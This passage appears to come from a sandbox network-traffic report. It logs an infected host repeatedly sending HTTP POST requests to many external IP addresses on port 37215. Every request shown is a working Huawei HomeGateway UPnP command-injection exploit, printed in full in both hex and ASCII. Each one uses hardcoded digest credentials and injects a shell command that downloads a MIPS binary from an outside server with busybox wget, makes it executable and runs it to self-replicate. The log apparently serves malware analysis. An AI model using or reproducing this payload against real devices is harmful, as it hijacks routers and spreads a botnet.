                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2816192.168.2.2350848157.88.55.25437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649738073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2817192.168.2.233863441.187.217.3837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649744034 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2818192.168.2.233827641.126.248.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649808884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2819192.168.2.235738039.249.12.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649843931 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2820192.168.2.2359672197.4.205.6437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649849892 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2821192.168.2.2334892197.209.143.737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649857998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2822192.168.2.2342596197.151.206.25037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649873972 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2823192.168.2.233886441.79.9.437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649874926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2824192.168.2.2346306197.38.186.19237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650288105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2825192.168.2.2348412212.247.51.16637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650326014 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
